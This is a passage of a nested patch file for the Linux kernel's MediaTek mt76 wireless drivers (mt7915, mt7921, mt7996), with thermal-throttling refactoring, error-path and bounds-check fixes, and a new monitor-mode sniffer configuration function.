+ 	if (state == phy->cdev_state)
+ 		return 0;
+ 
+@@ -198,11 +209,10 @@ static int mt7915_thermal_init(struct mt7915_phy *phy)
+ 		return PTR_ERR(hwmon);
+ 
+ 	/* initialize critical/maximum high temperature */
+-	phy->throttle_temp[0] = 110;
+-	phy->throttle_temp[1] = 120;
++	phy->throttle_temp[MT7915_CRIT_TEMP_IDX] = 110;
++	phy->throttle_temp[MT7915_MAX_TEMP_IDX] = 120;
+ 
+-	return mt7915_mcu_set_thermal_throttling(phy,
+-						 MT7915_THERMAL_THROTTLE_MAX);
++	return 0;
+ }
+ 
+ static void mt7915_led_set_config(struct led_classdev *led_cdev,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+index f0d5a3603902a..1a6def77db571 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+@@ -1061,9 +1061,6 @@ static void mt7915_mac_add_txs(struct mt7915_dev *dev, void *data)
+ 	u16 wcidx;
+ 	u8 pid;
+ 
+-	if (le32_get_bits(txs_data[0], MT_TXS0_TXS_FORMAT) > 1)
+-		return;
+-
+ 	wcidx = le32_get_bits(txs_data[2], MT_TXS2_WCID);
+ 	pid = le32_get_bits(txs_data[3], MT_TXS3_PID);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/main.c b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+index 0511d6a505b09..7589af4b3dab7 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+@@ -57,6 +57,17 @@ int mt7915_run(struct ieee80211_hw *hw)
+ 		mt7915_mac_enable_nf(dev, phy->mt76->band_idx);
+ 	}
+ 
++	ret = mt7915_mcu_set_thermal_throttling(phy,
++						MT7915_THERMAL_THROTTLE_MAX);
++
++	if (ret)
++		goto out;
++
++	ret = mt7915_mcu_set_thermal_protect(phy);
++
++	if (ret)
++		goto out;
++
+ 	ret = mt76_connac_mcu_set_rts_thresh(&dev->mt76, 0x92b,
+ 					     phy->mt76->band_idx);
+ 	if (ret)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+index b2652de082baa..f566ba77b2ed4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+@@ -2349,13 +2349,14 @@ void mt7915_mcu_exit(struct mt7915_dev *dev)
+ 	__mt76_mcu_restart(&dev->mt76);
+ 	if (mt7915_firmware_state(dev, false)) {
+ 		dev_err(dev->mt76.dev, "Failed to exit mcu\n");
+-		return;
++		goto out;
+ 	}
+ 
+ 	mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(0), MT_TOP_LPCR_HOST_FW_OWN);
+ 	if (dev->hif2)
+ 		mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(1),
+ 			MT_TOP_LPCR_HOST_FW_OWN);
++out:
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+ }
+ 
+@@ -2792,8 +2793,9 @@ int mt7915_mcu_get_eeprom(struct mt7915_dev *dev, u32 offset)
+ 	int ret;
+ 	u8 *buf;
+ 
+-	ret = mt76_mcu_send_and_get_msg(&dev->mt76, MCU_EXT_QUERY(EFUSE_ACCESS), &req,
+-				sizeof(req), true, &skb);
++	ret = mt76_mcu_send_and_get_msg(&dev->mt76,
++					MCU_EXT_QUERY(EFUSE_ACCESS),
++					&req, sizeof(req), true, &skb);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -2818,8 +2820,9 @@ int mt7915_mcu_get_eeprom_free_block(struct mt7915_dev *dev, u8 *block_num)
+ 	struct sk_buff *skb;
+ 	int ret;
+ 
+-	ret = mt76_mcu_send_and_get_msg(&dev->mt76, MCU_EXT_QUERY(EFUSE_FREE_BLOCK), &req,
+-					sizeof(req), true, &skb);
++	ret = mt76_mcu_send_and_get_msg(&dev->mt76,
++					MCU_EXT_QUERY(EFUSE_FREE_BLOCK),
++					&req, sizeof(req), true, &skb);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -3058,6 +3061,29 @@ int mt7915_mcu_get_temperature(struct mt7915_phy *phy)
+ }
+ 
+ int mt7915_mcu_set_thermal_throttling(struct mt7915_phy *phy, u8 state)
++{
++	struct mt7915_dev *dev = phy->dev;
++	struct mt7915_mcu_thermal_ctrl req = {
++		.band_idx = phy->mt76->band_idx,
++		.ctrl_id = THERMAL_PROTECT_DUTY_CONFIG,
++	};
++	int level, ret;
++
++	/* set duty cycle and level */
++	for (level = 0; level < 4; level++) {
++		req.duty.duty_level = level;
++		req.duty.duty_cycle = state;
++		state /= 2;
++
++		ret = mt76_mcu_send_msg(&dev->mt76, MCU_EXT_CMD(THERMAL_PROT),
++					&req, sizeof(req), false);
++		if (ret)
++			return ret;
++	}
++	return 0;
++}
++
++int mt7915_mcu_set_thermal_protect(struct mt7915_phy *phy)
+ {
+ 	struct mt7915_dev *dev = phy->dev;
+ 	struct {
+@@ -3070,29 +3096,18 @@ int mt7915_mcu_set_thermal_throttling(struct mt7915_phy *phy, u8 state)
+ 	} __packed req = {
+ 		.ctrl = {
+ 			.band_idx = phy->mt76->band_idx,
++			.type.protect_type = 1,
++			.type.trigger_type = 1,
+ 		},
+ 	};
+-	int level;
+-
+-	if (!state) {
+-		req.ctrl.ctrl_id = THERMAL_PROTECT_DISABLE;
+-		goto out;
+-	}
+-
+-	/* set duty cycle and level */
+-	for (level = 0; level < 4; level++) {
+-		int ret;
++	int ret;
+ 
+-		req.ctrl.ctrl_id = THERMAL_PROTECT_DUTY_CONFIG;
+-		req.ctrl.duty.duty_level = level;
+-		req.ctrl.duty.duty_cycle = state;
+-		state /= 2;
++	req.ctrl.ctrl_id = THERMAL_PROTECT_DISABLE;
++	ret = mt76_mcu_send_msg(&dev->mt76, MCU_EXT_CMD(THERMAL_PROT),
++				&req, sizeof(req.ctrl), false);
+ 
+-		ret = mt76_mcu_send_msg(&dev->mt76, MCU_EXT_CMD(THERMAL_PROT),
+-					&req, sizeof(req.ctrl), false);
+-		if (ret)
+-			return ret;
+-	}
++	if (ret)
++		return ret;
+ 
+ 	/* set high-temperature trigger threshold */
+ 	req.ctrl.ctrl_id = THERMAL_PROTECT_ENABLE;
+@@ -3101,10 +3116,6 @@ int mt7915_mcu_set_thermal_throttling(struct mt7915_phy *phy, u8 state)
+ 	req.trigger_temp = cpu_to_le32(phy->throttle_temp[1]);
+ 	req.sustain_time = cpu_to_le16(10);
+ 
+-out:
+-	req.ctrl.type.protect_type = 1;
+-	req.ctrl.type.trigger_type = 1;
+-
+ 	return mt76_mcu_send_msg(&dev->mt76, MCU_EXT_CMD(THERMAL_PROT),
+ 				 &req, sizeof(req), false);
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c b/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
+index 8388e2a658535..afa558c9a9302 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
+@@ -495,7 +495,7 @@ static u32 __mt7915_reg_addr(struct mt7915_dev *dev, u32 addr)
+ 
+ 	if (dev_is_pci(dev->mt76.dev) &&
+ 	    ((addr >= MT_CBTOP1_PHY_START && addr <= MT_CBTOP1_PHY_END) ||
+-	     (addr >= MT_CBTOP2_PHY_START && addr <= MT_CBTOP2_PHY_END)))
++	    addr >= MT_CBTOP2_PHY_START))
+ 		return mt7915_reg_map_l1(dev, addr);
+ 
+ 	/* CONN_INFRA: covert to phyiscal addr and use layer 1 remap */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h b/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
+index 6351feba6bdf9..e58650bbbd14a 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
+@@ -70,6 +70,9 @@
+ 
+ #define MT7915_WED_RX_TOKEN_SIZE	12288
+ 
++#define MT7915_CRIT_TEMP_IDX		0
++#define MT7915_MAX_TEMP_IDX		1
++
+ struct mt7915_vif;
+ struct mt7915_sta;
+ struct mt7915_dfs_pulse;
+@@ -543,6 +546,7 @@ int mt7915_mcu_apply_tx_dpd(struct mt7915_phy *phy);
+ int mt7915_mcu_get_chan_mib_info(struct mt7915_phy *phy, bool chan_switch);
+ int mt7915_mcu_get_temperature(struct mt7915_phy *phy);
+ int mt7915_mcu_set_thermal_throttling(struct mt7915_phy *phy, u8 state);
++int mt7915_mcu_set_thermal_protect(struct mt7915_phy *phy);
+ int mt7915_mcu_get_rx_rate(struct mt7915_phy *phy, struct ieee80211_vif *vif,
+ 			   struct ieee80211_sta *sta, struct rate_info *rate);
+ int mt7915_mcu_rdd_background_enable(struct mt7915_phy *phy,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/regs.h b/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
+index aca1b2f1e9e3b..7e0d86366c778 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
+@@ -803,7 +803,6 @@ enum offs_rev {
+ #define MT_CBTOP1_PHY_START		0x70000000
+ #define MT_CBTOP1_PHY_END		__REG(CBTOP1_PHY_END)
+ #define MT_CBTOP2_PHY_START		0xf0000000
+-#define MT_CBTOP2_PHY_END		0xffffffff
+ #define MT_INFRA_MCU_START		0x7c000000
+ #define MT_INFRA_MCU_END		__REG(INFRA_MCU_ADDR_END)
+ #define MT_CONN_INFRA_OFFSET(p)		((p) - MT_INFRA_BASE)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+index c06c56a0270d6..686c9bbd59293 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+@@ -278,6 +278,7 @@ static int mt7986_wmac_coninfra_setup(struct mt7915_dev *dev)
+ 		return -EINVAL;
+ 
+ 	rmem = of_reserved_mem_lookup(np);
++	of_node_put(np);
+ 	if (!rmem)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c b/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
+index 47e034a9b0037..ed9241d4aa641 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
+@@ -33,14 +33,17 @@ mt7921_acpi_read(struct mt7921_dev *dev, u8 *method, u8 **tbl, u32 *len)
+ 	    sar_root->package.elements[0].type != ACPI_TYPE_INTEGER) {
+ 		dev_err(mdev->dev, "sar cnt = %d\n",
+ 			sar_root->package.count);
++		ret = -EINVAL;
+ 		goto free;
+ 	}
+ 
+ 	if (!*tbl) {
+ 		*tbl = devm_kzalloc(mdev->dev, sar_root->package.count,
+ 				    GFP_KERNEL);
+-		if (!*tbl)
++		if (!*tbl) {
++			ret = -ENOMEM;
+ 			goto free;
++		}
+ 	}
+ 	if (len)
+ 		*len = sar_root->package.count;
+@@ -52,9 +55,9 @@ mt7921_acpi_read(struct mt7921_dev *dev, u8 *method, u8 **tbl, u32 *len)
+ 			break;
+ 		*(*tbl + i) = (u8)sar_unit->integer.value;
+ 	}
+-free:
+ 	ret = (i == sar_root->package.count) ? 0 : -EINVAL;
+ 
++free:
+ 	kfree(sar_root);
+ 
+ 	return ret;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/init.c b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+index 542dfd4251290..d4b681d7e1d22 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+@@ -175,7 +175,7 @@ u8 mt7921_check_offload_capability(struct device *dev, const char *fw_wm)
+ 
+ 	if (!fw || !fw->data || fw->size < sizeof(*hdr)) {
+ 		dev_err(dev, "Invalid firmware\n");
+-		return -EINVAL;
++		goto out;
+ 	}
+ 
+ 	data = fw->data;
+@@ -206,6 +206,7 @@ u8 mt7921_check_offload_capability(struct device *dev, const char *fw_wm)
+ 		data += le16_to_cpu(rel_info->len) + rel_info->pad_len;
+ 	}
+ 
++out:
+ 	release_firmware(fw);
+ 
+ 	return features ? features->data : 0;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index 76ac5069638fe..cdb0d61903935 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -422,15 +422,15 @@ void mt7921_roc_timer(struct timer_list *timer)
+ 
+ static int mt7921_abort_roc(struct mt7921_phy *phy, struct mt7921_vif *vif)
+ {
+-	int err;
+-
+-	if (!test_and_clear_bit(MT76_STATE_ROC, &phy->mt76->state))
+-		return 0;
++	int err = 0;
+ 
+ 	del_timer_sync(&phy->roc_timer);
+ 	cancel_work_sync(&phy->roc_work);
+-	err = mt7921_mcu_abort_roc(phy, vif, phy->roc_token_id);
+-	clear_bit(MT76_STATE_ROC, &phy->mt76->state);
++
++	mt7921_mutex_acquire(phy->dev);
++	if (test_and_clear_bit(MT76_STATE_ROC, &phy->mt76->state))
++		err = mt7921_mcu_abort_roc(phy, vif, phy->roc_token_id);
++	mt7921_mutex_release(phy->dev);
+ 
+ 	return err;
+ }
+@@ -487,13 +487,8 @@ static int mt7921_cancel_remain_on_channel(struct ieee80211_hw *hw,
+ {
+ 	struct mt7921_vif *mvif = (struct mt7921_vif *)vif->drv_priv;
+ 	struct mt7921_phy *phy = mt7921_hw_phy(hw);
+-	int err;
+ 
+-	mt7921_mutex_acquire(phy->dev);
+-	err = mt7921_abort_roc(phy, mvif);
+-	mt7921_mutex_release(phy->dev);
+-
+-	return err;
++	return mt7921_abort_roc(phy, mvif);
+ }
+ 
+ static int mt7921_set_channel(struct mt7921_phy *phy)
+@@ -1711,7 +1706,10 @@ static void mt7921_ctx_iter(void *priv, u8 *mac,
+ 	if (ctx != mvif->ctx)
+ 		return;
+ 
+-	mt76_connac_mcu_uni_set_chctx(mvif->phy->mt76, &mvif->mt76, ctx);
++	if (vif->type & NL80211_IFTYPE_MONITOR)
++		mt7921_mcu_config_sniffer(mvif, ctx);
++	else
++		mt76_connac_mcu_uni_set_chctx(mvif->phy->mt76, &mvif->mt76, ctx);
+ }
+ 
+ static void
+@@ -1778,11 +1776,8 @@ static void mt7921_mgd_complete_tx(struct ieee80211_hw *hw,
+ 				   struct ieee80211_prep_tx_info *info)
+ {
+ 	struct mt7921_vif *mvif = (struct mt7921_vif *)vif->drv_priv;
+-	struct mt7921_dev *dev = mt7921_hw_dev(hw);
+ 
+-	mt7921_mutex_acquire(dev);
+ 	mt7921_abort_roc(mvif->phy, mvif);
+-	mt7921_mutex_release(dev);
+ }
+ 
+ const struct ieee80211_ops mt7921_ops = {
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+index fb9c0f66cb27c..7253ce90234ef 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+@@ -174,7 +174,7 @@ mt7921_mcu_uni_roc_event(struct mt7921_dev *dev, struct sk_buff *skb)
+ 	wake_up(&dev->phy.roc_wait);
+ 	duration = le32_to_cpu(grant->max_interval);
+ 	mod_timer(&dev->phy.roc_timer,
+-		  round_jiffies_up(jiffies + msecs_to_jiffies(duration)));
++		  jiffies + msecs_to_jiffies(duration));
+ }
+ 
+ static void
+@@ -1093,6 +1093,74 @@ int mt7921_mcu_set_sniffer(struct mt7921_dev *dev, struct ieee80211_vif *vif,
+ 				 true);
+ }
+ 
++int mt7921_mcu_config_sniffer(struct mt7921_vif *vif,
++			      struct ieee80211_chanctx_conf *ctx)
++{
++	struct cfg80211_chan_def *chandef = &ctx->def;
++	int freq1 = chandef->center_freq1, freq2 = chandef->center_freq2;
++	const u8 ch_band[] = {
++		[NL80211_BAND_2GHZ] = 1,
++		[NL80211_BAND_5GHZ] = 2,
++		[NL80211_BAND_6GHZ] = 3,
++	};
++	const u8 ch_width[] = {
++		[NL80211_CHAN_WIDTH_20_NOHT] = 0,
++		[NL80211_CHAN_WIDTH_20] = 0,
++		[NL80211_CHAN_WIDTH_40] = 0,
++		[NL80211_CHAN_WIDTH_80] = 1,
++		[NL80211_CHAN_WIDTH_160] = 2,
++		[NL80211_CHAN_WIDTH_80P80] = 3,
++		[NL80211_CHAN_WIDTH_5] = 4,
++		[NL80211_CHAN_WIDTH_10] = 5,
++		[NL80211_CHAN_WIDTH_320] = 6,
++	};
++	struct {
++		struct {
++			u8 band_idx;
++			u8 pad[3];
++		} __packed hdr;
++		struct config_tlv {
++			__le16 tag;
++			__le16 len;
++			u16 aid;
++			u8 ch_band;
++			u8 bw;
++			u8 control_ch;
++			u8 sco;
++			u8 center_ch;
++			u8 center_ch2;
++			u8 drop_err;
++			u8 pad[3];
++		} __packed tlv;
++	} __packed req = {
++		.hdr = {
++			.band_idx = vif->mt76.band_idx,
++		},
++		.tlv = {
++			.tag = cpu_to_le16(1),
++			.len = cpu_to_le16(sizeof(req.tlv)),
++			.control_ch = chandef->chan->hw_value,
++			.center_ch = ieee80211_frequency_to_channel(freq1),
++			.drop_err = 1,
++		},
++	};
++	if (chandef->chan->band < ARRAY_SIZE(ch_band))
++		req.tlv.ch_band = ch_band[chandef->chan->band];
++	if (chandef->width < ARRAY_SIZE(ch_width))
++		req.tlv.bw = ch_width[chandef->width];
++
++	if (freq2)
++		req.tlv.center_ch2 = ieee80211_frequency_to_channel(freq2);
++
++	if (req.tlv.control_ch < req.tlv.center_ch)
++		req.tlv.sco = 1; /* SCA */
++	else if (req.tlv.control_ch > req.tlv.center_ch)
++		req.tlv.sco = 3; /* SCB */
++
++	return mt76_mcu_send_msg(vif->phy->mt76->dev, MCU_UNI_CMD(SNIFFER),
++				 &req, sizeof(req), true);
++}
++
+ int
+ mt7921_mcu_uni_add_beacon_offload(struct mt7921_dev *dev,
+ 				  struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h b/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
+index 15d6b7fe1c6c8..d4cfa26c373c3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
+@@ -529,6 +529,8 @@ void mt7921_set_ipv6_ns_work(struct work_struct *work);
+ 
+ int mt7921_mcu_set_sniffer(struct mt7921_dev *dev, struct ieee80211_vif *vif,
+ 			   bool enable);
++int mt7921_mcu_config_sniffer(struct mt7921_vif *vif,
++			      struct ieee80211_chanctx_conf *ctx);
+ 
+ int mt7921_usb_sdio_tx_prepare_skb(struct mt76_dev *mdev, void *txwi_ptr,
+ 				   enum mt76_txq_id qid, struct mt76_wcid *wcid,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/debugfs.c b/drivers/net/wireless/mediatek/mt76/mt7996/debugfs.c
+index 2e4a8909b9e80..3d4fbbbcc2062 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/debugfs.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/debugfs.c
+@@ -457,7 +457,7 @@ mt7996_hw_queue_read(struct seq_file *s, u32 size,
+ 		if (val & BIT(map[i].index))
+ 			continue;
+ 
+-		ctrl = BIT(31) | (map[i].pid << 10) | (map[i].qid << 24);
++		ctrl = BIT(31) | (map[i].pid << 10) | ((u32)map[i].qid << 24);
+ 		mt76_wr(dev, MT_FL_Q0_CTRL, ctrl);
+ 
+ 		head = mt76_get_field(dev, MT_FL_Q2_CTRL,
+@@ -653,8 +653,9 @@ static int
+ mt7996_rf_regval_set(void *data, u64 val)
+ {
+ 	struct mt7996_dev *dev = data;
++	u32 val32 = val;
+ 
+-	return mt7996_mcu_rf_regval(dev, dev->mt76.debugfs_reg, (u32 *)&val, true);
++	return mt7996_mcu_rf_regval(dev, dev->mt76.debugfs_reg, &val32, true);
+ }
+ 
+ DEFINE_DEBUGFS_ATTRIBUTE(fops_rf_regval, mt7996_rf_regval_get,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.c
+index b9f62bedbc485..5d8e0353627e1 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.c
+@@ -65,17 +65,23 @@ static int mt7996_eeprom_load(struct mt7996_dev *dev)
+ 	} else {
+ 		u8 free_block_num;
+ 		u32 block_num, i;
++		u32 eeprom_blk_size = MT7996_EEPROM_BLOCK_SIZE;
+ 
+-		/* TODO: check free block event */
+-		mt7996_mcu_get_eeprom_free_block(dev, &free_block_num);
+-		/* efuse info not enough */
++		ret = mt7996_mcu_get_eeprom_free_block(dev, &free_block_num);
++		if (ret < 0)
++			return ret;
++
++		/* efuse info isn't enough */
+ 		if (free_block_num >= 59)
+ 			return -EINVAL;
+ 
+ 		/* read eeprom data from efuse */
+-		block_num = DIV_ROUND_UP(MT7996_EEPROM_SIZE, MT7996_EEPROM_BLOCK_SIZE);
+-		for (i = 0; i < block_num; i++)
+-			mt7996_mcu_get_eeprom(dev, i * MT7996_EEPROM_BLOCK_SIZE);
++		block_num = DIV_ROUND_UP(MT7996_EEPROM_SIZE, eeprom_blk_size);
++		for (i = 0; i < block_num; i++) {
++			ret = mt7996_mcu_get_eeprom(dev, i * eeprom_blk_size);
++			if (ret < 0)
++				return ret;
++		}
+ 	}
+ 
+ 	return mt7996_check_eeprom(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mac.c b/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
+index 0b3e28748e76b..0eb9e4d73f2c1 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
+@@ -469,7 +469,7 @@ static int mt7996_reverse_frag0_hdr_trans(struct sk_buff *skb, u16 hdr_gap)
+ 		ether_addr_copy(hdr.addr4, eth_hdr->h_source);
+ 		break;
+ 	default:
+-		break;
++		return -EINVAL;
+ 	}
+ 
+ 	skb_pull(skb, hdr_gap + sizeof(struct ethhdr) - 2);
+@@ -959,51 +959,6 @@ mt7996_mac_write_txwi_80211(struct mt7996_dev *dev, __le32 *txwi,
+ 	}
+ }
+ 
+-static u16
+-mt7996_mac_tx_rate_val(struct mt76_phy *mphy, struct ieee80211_vif *vif,
+-		       bool beacon, bool mcast)
+-{
+-	u8 mode = 0, band = mphy->chandef.chan->band;
+-	int rateidx = 0, mcast_rate;
+-
+-	if (beacon) {
+-		struct cfg80211_bitrate_mask *mask;
+-
+-		mask = &vif->bss_conf.beacon_tx_rate;
+-		if (hweight16(mask->control[band].he_mcs[0]) == 1) {
+-			rateidx = ffs(mask->control[band].he_mcs[0]) - 1;
+-			mode = MT_PHY_TYPE_HE_SU;
+-			goto out;
+-		} else if (hweight16(mask->control[band].vht_mcs[0]) == 1) {
+-			rateidx = ffs(mask->control[band].vht_mcs[0]) - 1;
+-			mode = MT_PHY_TYPE_VHT;
+-			goto out;
+-		} else if (hweight8(mask->control[band].ht_mcs[0]) == 1) {
+-			rateidx = ffs(mask->control[band].ht_mcs[0]) - 1;
+-			mode = MT_PHY_TYPE_HT;
+-			goto out;
+-		} else if (hweight32(mask->control[band].legacy) == 1) {
+-			rateidx = ffs(mask->control[band].legacy) - 1;
+-			goto legacy;
+-		}
+-	}
+-
+-	mcast_rate = vif->bss_conf.mcast_rate[band];
+-	if (mcast && mcast_rate > 0)
+-		rateidx = mcast_rate - 1;
+-	else
+-		rateidx = ffs(vif->bss_conf.basic_rates) - 1;
+-
+-legacy:
+-	rateidx = mt76_calculate_default_rate(mphy, rateidx);
+-	mode = rateidx >> 8;
+-	rateidx &= GENMASK(7, 0);
+-
+-out:
+-	return FIELD_PREP(MT_TX_RATE_IDX, rateidx) |
+-	       FIELD_PREP(MT_TX_RATE_MODE, mode);
+-}
+-
+ void mt7996_mac_write_txwi(struct mt7996_dev *dev, __le32 *txwi,
+ 			   struct sk_buff *skb, struct mt76_wcid *wcid, int pid,
+ 			   struct ieee80211_key_conf *key, u32 changed)
+@@ -1091,7 +1046,8 @@ void mt7996_mac_write_txwi(struct mt7996_dev *dev, __le32 *txwi,
+ 		/* Fixed rata is available just for 802.11 txd */
+ 		struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)skb->data;
+ 		bool multicast = is_multicast_ether_addr(hdr->addr1);
+-		u16 rate = mt7996_mac_tx_rate_val(mphy, vif, beacon, multicast);
++		u16 rate = mt76_connac2_mac_tx_rate_val(mphy, vif, beacon,
++							multicast);
+ 
+ 		/* fix to bw 20 */
+ 		val = MT_TXD6_FIXED_BW |
+@@ -1690,7 +1646,7 @@ void mt7996_mac_set_timing(struct mt7996_phy *phy)
+ 	else
+ 		val = MT7996_CFEND_RATE_11B;
+ 
+-	mt76_rmw_field(dev, MT_AGG_ACR0(band_idx), MT_AGG_ACR_CFEND_RATE, val);
++	mt76_rmw_field(dev, MT_RATE_HRCR0(band_idx), MT_RATE_HRCR0_CFEND_RATE, val);
+ 	mt76_clear(dev, MT_ARB_SCR(band_idx),
+ 		   MT_ARB_SCR_TX_DISABLE | MT_ARB_SCR_RX_DISABLE);
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/main.c b/drivers/net/wireless/mediatek/mt76/mt7996/main.c
+index 4421cd54311b1..c423b052e4f4c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/main.c
+@@ -880,7 +880,10 @@ mt7996_set_antenna(struct ieee80211_hw *hw, u32 tx_ant, u32 rx_ant)
+ 	phy->mt76->antenna_mask = tx_ant;
+ 
+ 	/* restore to the origin chainmask which might have auxiliary path */
+-	if (hweight8(tx_ant) == max_nss)
++	if (hweight8(tx_ant) == max_nss && band_idx < MT_BAND2)
++		phy->mt76->chainmask = ((dev->chainmask >> shift) &
++					(BIT(dev->chainshift[band_idx + 1] - shift) - 1)) << shift;
++	else if (hweight8(tx_ant) == max_nss)
+ 		phy->mt76->chainmask = (dev->chainmask >> shift) << shift;
+ 	else
+ 		phy->mt76->chainmask = tx_ant << shift;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
+index 04e1d10bbd21e..d593ed9e3f73c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
+@@ -335,6 +335,9 @@ mt7996_mcu_rx_radar_detected(struct mt7996_dev *dev, struct sk_buff *skb)
+ 
+ 	r = (struct mt7996_mcu_rdd_report *)skb->data;
+ 
++	if (r->band_idx >= ARRAY_SIZE(dev->mt76.phys))
++		return;
++
+ 	mphy = dev->mt76.phys[r->band_idx];
+ 	if (!mphy)
+ 		return;
+@@ -412,6 +415,9 @@ mt7996_mcu_ie_countdown(struct mt7996_dev *dev, struct sk_buff *skb)
+ 	struct header *hdr = (struct header *)data;
+ 	struct tlv *tlv = (struct tlv *)(data + 4);
+ 
++	if (hdr->band >= ARRAY_SIZE(dev->mt76.phys))
++		return;
++
+ 	if (hdr->band && dev->mt76.phys[hdr->band])
+ 		mphy = dev->mt76.phys[hdr->band];
+ 
+@@ -903,8 +909,8 @@ mt7996_mcu_sta_he_tlv(struct sk_buff *skb, struct ieee80211_sta *sta)
+ 	he = (struct sta_rec_he_v2 *)tlv;
+ 	for (i = 0; i < 11; i++) {
+ 		if (i < 6)
+-			he->he_mac_cap[i] = cpu_to_le16(elem->mac_cap_info[i]);
+-		he->he_phy_cap[i] = cpu_to_le16(elem->phy_cap_info[i]);
++			he->he_mac_cap[i] = elem->mac_cap_info[i];
++		he->he_phy_cap[i] = elem->phy_cap_info[i];
+ 	}
+ 
+ 	mcs_map = sta->deflink.he_cap.he_mcs_nss_supp;
+@@ -2393,7 +2399,7 @@ mt7996_mcu_restart(struct mt76_dev *dev)
+ 		.power_mode = 1,
+ 	};
+ 
+-	return mt76_mcu_send_msg(dev, MCU_WM_UNI_CMD(POWER_CREL), &req,
++	return mt76_mcu_send_msg(dev, MCU_WM_UNI_CMD(POWER_CTRL), &req,
+ 				 sizeof(req), false);
+ }
+ 
+@@ -2454,13 +2460,14 @@ void mt7996_mcu_exit(struct mt7996_dev *dev)
+ 	__mt76_mcu_restart(&dev->mt76);
+ 	if (mt7996_firmware_state(dev, false)) {
+ 		dev_err(dev->mt76.dev, "Failed to exit mcu\n");
+-		return;
++		goto out;
+ 	}
+ 
+ 	mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(0), MT_TOP_LPCR_HOST_FW_OWN);
+ 	if (dev->hif2)
+ 		mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(1),
+ 			MT_TOP_LPCR_HOST_FW_OWN);
++out:
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+ }
+ 
+@@ -2921,8 +2928,9 @@ int mt7996_mcu_get_eeprom(struct mt7996_dev *dev, u32 offset)
+ 	bool valid;
